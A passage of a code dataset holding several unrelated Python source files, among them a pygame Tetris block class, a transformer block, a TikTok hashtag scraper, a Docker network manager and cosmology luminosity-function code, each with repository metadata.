self.rotations[target_rotation_index]\n tests = self.rotation_test[self.rotation_index][target_rotation_index]\n for x, y in tests:\n if self.can_move(self.grid_x+x, self.grid_y-y, temp_piece_grid):\n return x, -y\n return False\n\n # movement\n def move_down(self):\n if self.can_move_down():\n self.grid_y += 1\n return True\n else:\n return False\n\n def move_right(self):\n if self.can_move_right():\n self.grid_x += 1\n return True\n else:\n return False\n\n def move_left(self):\n if self.can_move_left():\n self.grid_x -= 1\n return True\n else:\n return False\n\n def can_move_down(self):\n return self.can_move(self.grid_x, self.grid_y + 1, self.get_block_grid())\n\n def can_move_right(self):\n return self.can_move(self.grid_x + 1, self.grid_y, self.get_block_grid())\n\n def can_move_left(self):\n return self.can_move(self.grid_x - 1, self.grid_y, self.get_block_grid())\n\n def can_move(self, grid_x, grid_y, piece_grid):\n for y in range(len(piece_grid)):\n for x in range(len(piece_grid)):\n if piece_grid[y][x] > 0:\n try:\n if self.screen_grid[grid_y + y][grid_x + x] != 0 or grid_x + x < 0:\n return False\n except IndexError:\n return False\n return True\n\n # drawing\n def draw_ghost_piece(self):\n ghost_y = None\n block_grid = self.get_block_grid()\n for i in range(1, 50):\n if not self.can_move(self.grid_x, self.grid_y + i, block_grid):\n ghost_y = self.grid_y + i - 1\n break\n for y in range(len(block_grid)):\n for x in range(len(block_grid[0])):\n if block_grid[y][x] > 0:\n real_x = x * self.block_size + self.grid_x * self.block_size + self.board.x\n real_y = y * self.block_size + ghost_y * self.block_size + self.board.y\n\n rect = pygame.Surface((self.block_size, self.block_size))\n rect.set_alpha(128)\n rect.fill(self.color)\n self.screen.blit(rect, (real_x, real_y))\n\n def draw_on_board(self):\n block_grid = self.get_block_grid()\n for y in range(len(block_grid)):\n for x in range(len(block_grid[0])):\n if block_grid[y][x] > 0:\n real_x = x * self.block_size + self.grid_x * self.block_size + self.board.x\n real_y = y * self.block_size + self.grid_y * self.block_size + self.board.y\n rect = pygame.Rect(real_x, real_y, self.block_size, self.block_size)\n pygame.draw.rect(self.screen, self.color, rect)\n\n def draw(self, x_offset, y_offset):\n block_grid = self.get_block_grid()\n for block_grid_y in range(len(block_grid)):\n for block_grid_x in range(len(block_grid[0])):\n if block_grid[block_grid_y][block_grid_x] > 0:\n real_x = block_grid_x * self.block_size + x_offset\n real_y = block_grid_y * self.block_size + y_offset\n rect = pygame.Rect(real_x, real_y, self.block_size, self.block_size)\n pygame.draw.rect(self.screen, self.color, rect)\n\n\nclass IBlock(Block):\n color = pygame.Color(\"Turquoise\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.kick_data = {\n 0: {\n 1: [(-2, 0), (1, 0), (-2, -1), (1, 2)],\n 3: [(-1, 0), (2, 0), (-1, 2), (2, -1)],\n },\n 1: {\n 0: [(2, 0), (-1, 0), (2, 1), (-1, 2)],\n 2: [(-1, 0), (2, 0), (-1, 2), (2, -1)],\n },\n 2: {\n 1: [(1, 0), (-2, 0), (1, -2), (-2, 2)],\n 3: [(2, 0), (-1, 0), (2, 1), (-1, -2)],\n },\n 3: {\n 2: [(-2, 0), (1, 0), (-2, -1), (1, 2)],\n 0: [(1, 0), (-2, 0), (1, -2), (-2, 1)],\n }\n }\n self.rotations = [\n [[0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0]],\n\n [[0, 1, 0, 0],\n [0, 1, 0, 0],\n [0, 1, 0, 0],\n [0, 1, 0, 0]],\n ]\n\n\nclass JBlock(Block):\n color = pygame.Color(\"RoyalBlue\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [2, 0, 0, 0],\n [2, 2, 2, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 2, 2, 0],\n [0, 2, 0, 0],\n [0, 2, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [2, 2, 2, 0],\n [0, 0, 2, 0]],\n\n [[0, 0, 0, 0],\n [0, 2, 0, 0],\n [0, 2, 0, 0],\n [2, 2, 0, 0]],\n ]\n\n\nclass LBlock(Block):\n color = pygame.Color(\"Coral\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 0, 3, 0],\n [3, 3, 3, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 3, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [3, 3, 3, 0],\n [3, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [3, 3, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 0, 0]],\n ]\n\n\nclass OBlock(Block):\n color = pygame.Color(\"Gold\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n ]\n\n\nclass SBlock(Block):\n color = pygame.Color(\"LightGreen\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 5, 5, 0],\n [5, 5, 0, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 5, 0, 0],\n [0, 5, 5, 0],\n [0, 0, 5, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 5, 5, 0],\n [5, 5, 0, 0]],\n\n [[0, 0, 0, 0],\n [5, 0, 0, 0],\n [5, 5, 0, 0],\n [0, 5, 0, 0]],\n ]\n\nclass TBlock(Block):\n color = pygame.Color(\"Orchid\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [6, 6, 6, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [0, 6, 6, 0],\n [0, 6, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [6, 6, 6, 0],\n [0, 6, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [6, 6, 0, 0],\n [0, 6, 0, 0]],\n ]\n\n\nclass ZBlock(Block):\n color = pygame.Color(\"OrangeRed\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [7, 7, 0, 0],\n [0, 7, 7, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 7, 0],\n [0, 7, 7, 0],\n [0, 7, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [7, 7, 0, 0],\n [0, 7, 7, 0]],\n\n [[0, 0, 0, 0],\n [0, 7, 0, 0],\n [7, 7, 0, 0],\n [7, 0, 0, 0]],\n ]\n","repo_name":"vonkez/Tetris-pygame","sub_path":"scenes/game/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32783518857","text":"# Insertion mutation\r\n# Permutation encoding\r\n# for TSP style problems\r\n# C.NELSON 2018\r\n#### THEORY #########\r\n# subject:\r\n# 25036147\r\n# choose a number\r\n# v\r\n# 25036147 [3] value\r\n# choose a position\r\n# | [1] position\r\n# 25036147\r\n# insert value and shift\r\n# remaining values accordingly \r\n# 23506147 = mutated\r\n########################\r\n\r\nimport random\r\n\r\n\r\ndef i_mask(length):\r\n val = random.randrange(length)\r\n pos = random.randrange(length)\r\n if val == pos:\r\n val, pos = i_mask(length)\r\n return val, pos\r\n\r\n\r\ndef insertion(subject):\r\n value, position = i_mask(len(subject))\r\n actual_val = subject[value]\r\n int_subj = list(subject) # interim copy\r\n int_subj.remove(actual_val)\r\n int_subj.insert(position, actual_val)\r\n return int_subj\r\n\r\n\r\nx = insertion(list(\"1234567\"))\r\nprint(x)\r\n","repo_name":"ccnelson/Python","sub_path":"gen_al/mutation/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29467165929","text":"lista=[]\ndef buscarTodas(a,b):\n global x\n global y\n n=len(a)\n g=list(a)\n y=\"\"\n for x in range(0,n):\n h=g[x]\n if h==b:\n lista.append(x)\n print(lista)\n final=\" \".join(str(x) for x in lista)\n return final\n \nif __name__ == \"__main__\":\n f=input(\"ingrese la frase: \")\n l=input(\"ingrese la letra: \")\n buscarTodas(f,l)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej2/tema8_ej2_3a404eb99342dcad9b2f23e1e08ec05c.py","file_name":"tema8_ej2_3a404eb99342dcad9b2f23e1e08ec05c.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25719780609","text":"\"\"\"Sets the values for displaying supported chars on a Waveshare RGB LED Pico hat (in landscape)\n\nSee code.py (in root) for full details.\n\n\"\"\"\n\nimport re\nfrom random import randint\n\nfrom wsgi_web_app_helpers import get_json_wsgi_input, bad_request\n\n\nclass TooManyCharsException(Exception):\n \"\"\"Oh no, there are too many characters\"\"\"\n\n\n# The index of the nested list is the digit it represents\ndigits = {\n 0: [\n [44, 45, 59, 62, 75, 78, 91, 94, 107, 110, 123, 126, 140, 141], # 0\n [44, 45, 46, 61, 77, 93, 109, 125, 126, 141], # 1\n [43, 44, 45, 46, 62, 77, 92, 107, 123, 126, 140, 141], # 2\n [44, 45, 59, 62, 75, 92, 93, 107, 123, 126, 140, 141], # 3....\n [44, 60, 76, 91, 92, 93, 94, 108, 110, 124, 126, 140, 142],\n [44, 45, 46, 59, 75, 92, 93, 94, 110, 126, 139, 140, 141, 142],\n [44, 45, 59, 62, 75, 78, 92, 93, 94, 110, 125, 140],\n [45, 61, 77, 93, 108, 123, 139, 140, 141, 142],\n [44, 45, 59, 62, 75, 78, 92, 93, 107, 110, 123, 126, 140, 141],\n [43, 59, 75, 91, 92, 93, 107, 110, 123, 126, 140, 141],\n [92, 93, 94] # minus\n ],\n 1: [\n [121, 136, 135, 118, 102, 70, 54, 57, 40, 39, 73, 105, 89, 86], # 0\n [40, 41, 42, 57, 73, 89, 105, 121, 122, 137], # 1\n [39, 40, 41, 42, 58, 73, 88, 103, 119, 122, 136, 137], # 2\n [40, 41, 55, 58, 71, 88, 89, 103, 119, 122, 136, 137], # 3....\n [41, 57, 73, 88, 89, 90, 91, 105, 107, 121, 123, 137, 139],\n [40, 41, 42, 55, 71, 88, 89, 90, 106, 122, 135, 136, 137, 138],\n [40, 41, 55, 58, 71, 74, 88, 89, 90, 106, 121, 136],\n [41, 57, 73, 89, 104, 119, 135, 136, 137, 138],\n [39, 40, 54, 57, 70, 73, 87, 88, 102, 105, 118, 121, 135, 136],\n [39, 55, 71, 87, 88, 89, 103, 106, 119, 122, 136, 137],\n [88, 89, 90] # minus\n ]\n}\n\n\ndef gen_char_values(chars):\n \"\"\"\n Generates the character pixel lists for supported characters.\n\n params:\n - chars (str): the chars to display on the RGB screen\n\n returns:\n - tuple: list[int], str\n \"\"\"\n num_chars = len(chars)\n max_chars = len(list(digits.keys())) # the list typecast is due to MicroPython awfulness\n if num_chars > max_chars:\n raise TooManyCharsException(\"'%s' exceeds the character limit: %s\" % (chars, max_chars))\n\n active_pixels = []\n # We will set the character positions from left to right\n for index, char in enumerate(chars):\n if char == \"-\":\n char = 10\n else:\n # allow a ValueError to be thrown if we aren't int'able.\n char = int(char)\n\n active_pixels.extend(digits[index][char])\n\n if chars == \"--\":\n background_colour = \"red\"\n else:\n real_num = int(chars)\n if real_num < 15:\n background_colour = \"blue\"\n elif 15 <= real_num < 26:\n background_colour = \"green\"\n elif 26 <= real_num < 30:\n background_colour = \"yellow\"\n else:\n background_colour = \"red\"\n\n return active_pixels, background_colour\n\n\ndef clear(neo):\n \"\"\"Clears the screen\"\"\"\n neo.fill([0, 0, 0])\n neo.show()\n return None, None\n\n\nclass BaseDisplayHandler:\n \"\"\"Base class for handling display controls from JSON POST request data.\"\"\"\n\n def __init__(self, json_request, neo, num_px):\n self.response = None\n self.status_code = None\n self.req_data = get_json_wsgi_input(json_request, bad_request)\n self.neo = neo\n self.num_px = num_px\n\n def clear(self):\n return clear(self.neo)\n\n def set(self):\n raise NotImplementedError(\"set method needs implementing.\")\n\n\nclass SetPx(BaseDisplayHandler):\n\n def set(self):\n if not isinstance(self.req_data, dict): # Something bad has happened here.\n return self.req_data\n\n self.clear()\n for rgb, pixels in self.req_data.items():\n if re.match(\"\\d\\d\\d\", rgb) and isinstance(pixels, list):\n for px in pixels:\n try:\n px_int = int(px)\n except Exception:\n return bad_request(\"Pixel numbers from list must be integers\")\n if px_int > self.num_px:\n return bad_request(\n \"Cannot set value to pixel %s. Max supported: %s\" % (px_int, self.num_px)\n )\n\n self.neo[int(px)] = [int(x * 200) for x in rgb]\n else:\n return bad_request('Input did not match schema. Example: {\"010\": [1,2,3,4,5], \"011\": [16,60]}')\n\n self.neo.show()\n return self.response, self.status_code\n\n\nclass DisplayUpdater:\n\n # background colours\n blue = [[0, 0, 200], [200, 200, 200]]\n yellow = [[200, 200, 0], [200, 0, 200]]\n green = [[0, 200, 0], [0, 200, 200]]\n red = [[200, 0, 0], [0, 0, 0]]\n\n def __init__(self, display_text, display_text_colour, background_colour, neo, num_px):\n self.display_text = display_text\n self.display_text_colour = display_text_colour\n self.background_colour = background_colour\n self.neo = neo\n self.num_px = num_px\n\n def set(self):\n normalized_text_colour = [int(int(x) * 200) for x in self.display_text_colour]\n # create entire screen (background)\n for x in range(self.num_px):\n self.neo[x] = getattr(self, self.background_colour)[randint(0, 1)]\n\n # update screen values to include the temp value\n for text_px in self.display_text:\n self.neo[int(text_px)] = normalized_text_colour\n\n self.neo.show()\n\n\nclass SetTemp(BaseDisplayHandler):\n\n def set(self):\n if not isinstance(self.req_data, dict): # Something bad has happened here.\n return self.req_data\n\n rbg_text_colour = None\n for rgb, temp_value in self.req_data.items():\n # make sure we are a string\n temp_value = str(temp_value)\n # simple regex for temp. \"--\" is a valid value for null, \\d- is clearly just nonsense.\n # regex's are a little hideous as MicroPython's regex engine isn't too glamorous...\n if re.match(\"\\d\\d\\d\", rgb) and re.match(\"(--)|(^-\\d)|(\\d\\d)|(\\d)\", temp_value):\n rgb_temp_vals, background_colour = gen_char_values(temp_value)\n rbg_text_colour = rgb\n break\n else:\n raise Exception(\n \"Input value %s doesn't appear to match the expected format: \\{'001': '-3'\\}.\" % self.req_data\n )\n\n return DisplayUpdater(rgb_temp_vals, rbg_text_colour, background_colour, self.neo, self.num_px)\n","repo_name":"another-salad/pico-temp-display","sub_path":"libs/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9970519249","text":"from utils import *\nfrom multiheadattentiom import *\n\nclass TransformerBlock(nn.Module):\n def __init__(self, embed_dim, exapansion_factor=4, n_heads=4):\n super(TransformerBlock, self).__init__()\n\n self.attention = MultiheadedAttention(embed_dim, n_heads)\n self.norm1 = nn.Linear(embed_dim)\n self.norm2 = nn.Linear(embed_dim)\n\n self.feed_forward = nn.Sequential(\n nn.Linear(embed_dim, exapansion_factor*embed_dim),\n nn.ReLU(),\n nn.Linear(exapansion_factor*embed_dim, embed_dim)\n )\n\n self.dropout1 = nn.Dropout(0.2)\n self.dropout2 = nn.Dropout(0.2)\n\n def forward(self, key, query, value, mask=None):\n\n attention_out = self.attention(key, query, value, mask)\n attention_residual_out = attention_out + value\n norm1_out = self.dropout1(self.norm1(attention_residual_out))\n\n feed_fwd_out = self.feed_forward(norm1_out)\n\n feed_fwd_residual_out = feed_fwd_out + norm1_out\n\n norm2_out = self.dropout2(self.norm2(feed_fwd_residual_out))\n\n return norm2_out","repo_name":"anilnishad19799/Transformer_from_scratch","sub_path":"transformerblock.py","file_name":"transformerblock.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24227492349","text":"# %%\n# https://pypi.org/project/pyttsx3/\n\nimport pyttsx3\nengine = pyttsx3.init() # object creation\n\n\"\"\" RATE\"\"\"\nrate = engine.getProperty('rate') # getting details of current speaking rate\nengine.setProperty('rate', 150) # setting up new voice rate\n\"\"\"VOLUME\"\"\"\nvolume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\nengine.setProperty('volume',1.0) # setting up volume level between 0 and 1\n\"\"\"VOICE\"\"\"\nvoices = engine.getProperty('voices') #getting details of current voice\nengine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female\n\n\"\"\"Saving Voice to a file\"\"\"\nengine.save_to_file('Clean and develop using Python. This is the presentation from group F. Abdulaziz, Juan Pedro, Jacob, Aleksandar, Esperanza and Addison', 'storage/slide_1.mp3')\nengine.save_to_file('EXPLORATORY DATA ANALYSIS, or EDA for short.', 'storage/slide_5.mp3')\nengine.save_to_file(\"DATA PREPARATION. Let's talk about data quality and how to fix.\", 'storage/slide_11.mp3')\nengine.save_to_file(\"Modelling. We are going to create and evaluate linear regression models.\", 'storage/slide_21.mp3')\nengine.save_to_file(\"Thank you.\", 'storage/slide_28.mp3')\nengine.runAndWait()\n\n# %%\n","repo_name":"juanbretti/gmbd_python_group1","sub_path":"Group_F_TTS.py","file_name":"Group_F_TTS.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37935697498","text":"def next(li,n):\n for i in range(0,n):\n if i==n-1:\n break\n elif li[i]==3 and li[i+1]==3:\n return True\n return False\n\nli=[]\nn=int(input('enter the number of elements you want in list:'))\nfor i in range(0,n):\n x=int(input('enter element'))\n li.append(x)\nprint(next(li,n))","repo_name":"Simran21Arora/CYBER","sub_path":"assignment3/ques5.py","file_name":"ques5.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20290136772","text":"import time\nfrom tiktokapipy.api import TikTokAPI\nimport csv\nimport warnings\nfrom tiktokapipy import TikTokAPIWarning\n\nwarnings.filterwarnings(\"ignore\", category=TikTokAPIWarning)\n\n\ndef getHashtaggedVideos():\n seen = set()\n arr = []\n with TikTokAPI() as api:\n challenge = api.challenge(challenge_name=\"fashion\", video_limit=100)\n # some videos are unable to be parsed by this api, we give a little cushion here to make sure we can get to 100 total\n for video in challenge.videos.limit(120):\n if not video:\n continue\n if video.id not in seen:\n seen.add(video.id)\n arr.append(video)\n # return once we find 100\n if len(arr) == 100:\n return arr\n return arr\n\n\nif __name__ == \"__main__\":\n print(\"fetching videos\")\n startTime = round(time.time())\n\n vids = getHashtaggedVideos()\n rows = []\n for vid in vids:\n row = [vid.id, vid.desc, [c.title for c in vid.challenges], vid.stats.play_count, vid.stats.comment_count, vid.stats.share_count, vid.video.play_addr, vid.video.download_addr, vid.music.id, vid.music.title, vid.author.unique_id, vid.create_time, startTime]\n rows.append(row)\n\n field_names = [\"VideoID\", \"VideoDescription\", \"HashTags\", \"PlayCount\", \"CommentCount\", \"ShareCount\", \"VideoPlayAddr\", \"VideoDownloadAddr\", \"MusicID\", \"AuthorID\", \"DatePosted\", \"DateFetched\"]\n\n csv_file_path = f\"scraped_data_{startTime}.csv\"\n\n with open(csv_file_path, mode='w', newline='', encoding='utf-8') as csv_file:\n print(f\"writing file to {csv_file_path}\")\n writer = csv.writer(csv_file)\n writer.writerow(field_names)\n writer.writerows(rows)\n\n print(\"exited successfully\")","repo_name":"sethengland/TTFashionScraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24040631615","text":"import ipaddress\nimport json\n\nfrom cirque.common.cirquelog import CirqueLog\nfrom cirque.common.utils import host_run, manipulate_iptable_src_dst_rule\n\nIPV6_SUBNET = \"2001:db8:1::/64\"\nIPV6_GATEWAY = \"2001:db8:1::1\"\n\nclass HomeLan:\n\n def __init__(self, name, internal=False, ipv6=False):\n self.logger = CirqueLog.get_cirque_logger('lan_{}'.format(name))\n self.__name = name\n self.__internal = internal\n self.__ipv6 = ipv6\n self.subnet = None\n self.gateway = None\n if 'ipvlan' in self.__name:\n self.__create_ipvlan_network()\n else:\n self.__create_docker_network()\n # bypass disable mutual access for ipv4\n # in ipv6 feature.\n if 'ipv6' not in self.__name:\n self.__disable_container_mutual_access()\n\n def __create_docker_network(self):\n # The docker-py library will add a weird route which disconnects\n # the host when creating networks. The `docker network inspect`isn't\n # supported neither so we use bash commands directly.\n cmd = ['docker', 'network', 'create', self.__name]\n if self.__internal:\n cmd.append('--internal')\n elif self.__ipv6:\n cmd.append('--subnet=\"{}\"'.format(IPV6_SUBNET))\n cmd.append('--gateway=\"{}\"'.format(IPV6_GATEWAY))\n cmd.append('--ipv6')\n ret = host_run(self.logger, cmd)\n if ret.returncode != 0:\n self.logger.error('Failed to create home lan %s', self.__name)\n if self.__ipv6:\n self.__enable_ipv6_external_access()\n\n def __create_ipvlan_network(self):\n interface_command = \"route | awk '/default / {print $8}'\"\n ret = host_run(self.logger, interface_command)\n if ret.returncode != 0:\n self.logger.error('Failed to get network interface for creating '\n 'ipvlan %s: %s' % (self.__name, ret.stderr))\n interface = ret.stdout.rstrip().decode('utf-8')\n subnet_command = \"ip addr show %s | awk '/inet / {print $2}'\" % interface\n ret = host_run(self.logger, subnet_command)\n if ret.returncode != 0:\n self.logger.error('Failed to get subnetwork for create '\n 'ipvalen %s: %s' % (self.__name, ret.stderr))\n subnet = ret.stdout.rstrip().decode('utf-8')\n gateway_command = \"ip r | awk '/default via/ {print $3}'\"\n ret = host_run(self.logger, gateway_command)\n if ret.returncode != 0:\n self.logger.error('Failed to retrieve gateway for create '\n 'ipvalen %s: %s' % (self.__name, ret.stderr))\n gateway = ret.stdout.rstrip().decode('utf-8')\n ipvlan_command = 'docker network create -d ipvlan --subnet=%s'\\\n ' --gateway=%s -o parent=%s %s' % (\n subnet, gateway, interface, self.__name)\n ret = host_run(self.logger, ipvlan_command)\n if ret.returncode != 0:\n self.logger.error('Failed to create ipvlan %s: %s' %\n (self.__name, ret.stderr))\n self.__inspect_network_properties()\n\n def __disable_container_mutual_access(self):\n self.__inspect_network_properties()\n manipulate_iptable_src_dst_rule(self.logger, self.subnet, self.subnet,\n 'DROP')\n manipulate_iptable_src_dst_rule(self.logger, self.gateway, self.subnet,\n 'ACCEPT')\n manipulate_iptable_src_dst_rule(self.logger, self.subnet, self.gateway,\n 'ACCEPT')\n\n def __disable_ipv6_external_access(self):\n flush_command = \"ip6tables -t nat -F\"\n ret = host_run(self.logger, flush_command)\n if ret.returncode != 0:\n self.logger.error(\"Unable to flush nat rule from ipv6...\")\n\n def __enable_ipv6_external_access(self):\n ip6tables_command = \" \".join(\n [\"ip6tables -t nat -A POSTROUTING -s {}\".format(IPV6_SUBNET),\n \"! -o docker0 -j MASQUERADE\"])\n ret = host_run(self.logger, ip6tables_command)\n if ret.returncode != 0:\n self.logger.error('Fail to setup ipv6 external access in ip6tables')\n\n def __inspect_network_properties(self):\n ret = host_run(self.logger, ['docker', 'network', 'inspect', self.__name])\n if ret.returncode != 0:\n self.logger.error('Failed to inspect home lan %s' % self.__name)\n return\n network_info = json.loads(ret.stdout.decode())\n if not network_info:\n self.logger.error('Failed to inspect home lan %s' % self.__name)\n return\n network_configs = network_info[0]['IPAM']['Config']\n if 'ipv6' not in self.__name and len(network_configs) != 1:\n self.logger.error('Unexpected network behavior on home lan %s' %\n self.__name)\n self.subnet = network_configs[0]['Subnet']\n self.gateway = network_configs[0]['Gateway']\n\n def close(self):\n if not self.subnet:\n return\n cmd = ['docker', 'network', 'rm', self.__name]\n if host_run(self.logger, cmd).returncode != 0:\n self.logger.error('Failed to remove home lan %s', self.__name)\n if self.__ipv6:\n self.__disable_ipv6_external_access()\n if all(nwk not in self.__name for nwk in ('ipv6', 'ipvlan')):\n manipulate_iptable_src_dst_rule(\n self.logger, self.subnet, self.subnet, 'DROP', add=False)\n manipulate_iptable_src_dst_rule(\n self.logger, self.gateway, self.subnet, 'ACCEPT', add=False)\n manipulate_iptable_src_dst_rule(\n self.logger, self.subnet, self.gateway, 'ACCEPT', add=False)\n self.gateway = None\n self.subnet = None\n\n @property\n def name(self):\n return self.__name\n\n @property\n def internal(self):\n return self.__internal\n\n def __del__(self):\n self.close()\n","repo_name":"openweave/cirque","sub_path":"cirque/connectivity/homelan.py","file_name":"homelan.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"77"} +{"seq_id":"11999559354","text":"\"\"\"\n\nCompute UVLFs given our SFR and HMF models.\n\nAuthor: Julian B. Muñoz\nUT Austin - June 2023\n\n\"\"\"\n\nfrom . import cosmology\nfrom . import constants\nfrom .sfrd import SFR\nfrom .cosmology import bias_Tinker\n\nimport numpy as np\nfrom scipy.special import erf\n\n\n\n\n\n\ndef MUV_of_SFR(SFRtab, kappaUV):\n 'returns MUV, uses SFR. Dust added later in loglike.'\n #convert SFR to MUVs\n LUVtab = SFRtab/kappaUV\n MUVtab = 51.63 - 2.5 * np.log10(LUVtab) #AB magnitude \n return MUVtab\n\n\n#and combine to get UVLF:\ndef UVLF_binned(Astro_Parameters,Cosmo_Parameters,HMF_interpolator, zcenter, zwidth, MUVcenters, MUVwidths, DUST_FLAG=True, RETURNBIAS = False):\n 'Binned UVLF in units of 1/Mpc^3/mag, for bins at with a Gaussian width zwidth, centered at MUV centers with tophat width MUVwidths. z width only in HMF since that varies the most rapidly. If flag RETURNBIAS set to true it returns number-avgd bias instead of UVLF, still have to divide by UVLF'\n \n if(constants.NZ_TOINT>1):\n DZ_TOINT = np.linspace(-np.sqrt(constants.NZ_TOINT/3.),np.sqrt(constants.NZ_TOINT/3.),constants.NZ_TOINT) #in sigmas around zcenter\n else:\n DZ_TOINT = np.array([0.0])\n WEIGHTS_TOINT = np.exp(-DZ_TOINT**2/2.)/np.sum(np.exp(-DZ_TOINT**2/2.)) #assumed Gaussian in z, fair\n\n\n\n \n SFRlist = SFR(Astro_Parameters,Cosmo_Parameters,HMF_interpolator,zcenter)\n sigmaUV = Astro_Parameters.sigmaUV\n \n if (constants.FLAG_RENORMALIZE_LUV == True): #lower the LUV (or SFR) to recover the true avg, not log-avg\n SFRlist/= np.exp((np.log(10)/2.5*sigmaUV)**2/2.0)\n \n MUVbarlist = MUV_of_SFR(SFRlist, Astro_Parameters._kappaUV) #avg for each Mh\n MUVbarlist = np.fmin(MUVbarlist,constants._MAGMAX)\n \n \n\n if(RETURNBIAS==True): # weight by bias\n biasM = np.array([bias_Tinker(Cosmo_Parameters, HMF_interpolator.sigma_int(HMF_interpolator.Mhtab,zcenter+dz*zwidth)) for dz in DZ_TOINT])\n else: # do not weight by bias\n biasM = np.ones_like(WEIGHTS_TOINT)\n \n \n HMFtab = np.array([HMF_interpolator.HMF_int(HMF_interpolator.Mhtab,zcenter+dz*zwidth) for dz in DZ_TOINT])\n HMFcurr = np.sum(WEIGHTS_TOINT * HMFtab.T * biasM.T,axis=1)\n\n #cannot directly 'dust' the theory since the properties of the IRX-beta relation are calibrated on observed MUV. Recursion instead: \n currMUV = MUVbarlist \n if(DUST_FLAG==True):\n currMUV2 = np.ones_like(currMUV)\n while(np.sum(np.abs((currMUV2-currMUV)/currMUV)) > 0.02):\n currMUV = MUVbarlist + AUV(Astro_Parameters,zcenter,currMUV) \n currMUV2 = currMUV\n \n \n MUVcuthi = MUVcenters + MUVwidths/2.\n MUVcutlo = MUVcenters - MUVwidths/2.\n \n xhi = np.subtract.outer(MUVcuthi , currMUV)/(np.sqrt(2) * sigmaUV)\n xlo = np.subtract.outer(MUVcutlo, currMUV )/(np.sqrt(2) * sigmaUV)\n weights = (erf(xhi) - erf(xlo)).T/(2.0 * MUVwidths)\n \n UVLF_filtered = np.trapz(weights.T * HMFcurr, HMF_interpolator.Mhtab, axis=-1)\n \n return UVLF_filtered\n\n\n\n\n\n#####Here the dust attenuation\ndef AUV(Astro_Parameters, z, MUV, HIGH_Z_DUST = True, _zmaxdata=8.0):\n 'Average attenuation A as a function of OBSERVED z and magnitude. If using on theory iterate until convergence. HIGH_Z_DUST is whether to do dust at higher z than 0 or set to 0. Fix at \\beta(z=8) result if so'\n \n betacurr = beta(z,MUV)\n \n C0, C1 = Astro_Parameters.C0dust, Astro_Parameters.C1dust \n \n sigmabeta = 0.34 #from Bouwens 2014\n \n Auv = C0 + 0.2*np.log(10)*sigmabeta**2 * C1**2 + C1 * betacurr\n Auv=Auv.T\n if not (HIGH_Z_DUST):\n Auv*=np.heaviside(_zmaxdata - z,0.5)\n Auv=Auv.T\n return np.fmax(Auv, 0.0)\n\ndef beta(z, MUV):\n 'Color as a function of redshift and mag, interpolated from Bouwens 